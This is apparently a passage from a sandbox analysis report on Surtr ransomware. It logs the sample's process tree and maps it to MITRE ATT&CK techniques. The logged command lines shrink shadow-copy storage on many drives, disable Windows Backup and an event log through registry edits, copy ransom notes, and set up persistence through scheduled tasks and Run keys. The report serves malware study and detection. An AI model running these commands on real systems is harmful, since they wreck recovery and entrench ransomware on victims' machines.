    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:968
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
  2⤵
  PID:2780
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3544
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:5648
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
  2⤵
  PID:2760
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:4716
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:4884
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:5668
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:5148
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:4888
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
  2⤵
  PID:5208
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:4136
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:5200
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:3480
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
  2⤵
  PID:5300
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1392
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:5292
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:676
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:5420
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:2600
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
  2⤵
  PID:5728
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
  2⤵
  PID:5828
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3388
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
  2⤵
  PID:4820
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2992
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
  2⤵
  PID:880
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3436
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
  2⤵
  PID:1524
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:228
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
  2⤵
  PID:688
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:3392
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
  2⤵
  PID:3104
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:2212
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
  2⤵
  PID:4868
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2484
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
  2⤵
  PID:2540
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:5460
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
  2⤵
  PID:6064
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1292
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
  2⤵
  PID:5936
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4012
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
  2⤵
  PID:1080
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:5652
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
  2⤵
  PID:4532
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3636
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
  2⤵
  PID:1408
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4948
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
  2⤵
  PID:5156
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
  2⤵
  PID:2404
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
  2⤵
  PID:768
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3264
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
  2⤵
  PID:4556
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4172
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
  2⤵
  PID:2252
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:2072
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
  2⤵
  PID:760
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5348
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
  2⤵
  PID:4980
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
  2⤵
  PID:3176
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
  2⤵
  PID:1468
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3000
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
  2⤵
  PID:5924
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
  2⤵
  PID:5812
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
  2⤵
  PID:5708
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:5676
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:1132
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:5552
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
  2⤵
  PID:5540
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:5480
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
  2⤵
  PID:5464
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:5440
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:5360
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
  2⤵
  PID:5352
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:5328
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PublicData_3w6r82pc4b3jym.surt" "%TEMP%\Service\PublicData_3w6r82pc4b3jym.surt"
  2⤵
  PID:5636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PrivateData_3w6r82pc4b3jym.surt" "%TEMP%\Service\PrivateData_3w6r82pc4b3jym.surt"
  2⤵
  PID:5964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
  2⤵
  PID:4236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
  2⤵
  PID:2632
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
  2⤵
  PID:4064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
  2⤵
  PID:4148
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R /S "C:\ProgramData\Service"
    3⤵
    - Views/modifies file attributes
    PID:5108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
  2⤵
  PID:5508
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
    3⤵
    - Views/modifies file attributes
    PID:4844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  PID:4268
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Enumerates connected drives
    - Creates scheduled task(s)
    PID:1292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
  2⤵
  PID:952
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
  2⤵
  - Drops startup file
  PID:3920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:5556
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:5840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:5768
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:5384
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:6056
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:4772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:3284
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:6100

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4968

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:564

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:3256

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
1⤵
PID:5652

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
1⤵
PID:4244

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
1⤵
PID:2352

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4248

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2100

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
1⤵
PID:4896

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3260

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4940

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
1⤵
PID:2016

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6116

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2688

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:5408

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Data Destruction

T1485

Inhibit System Recovery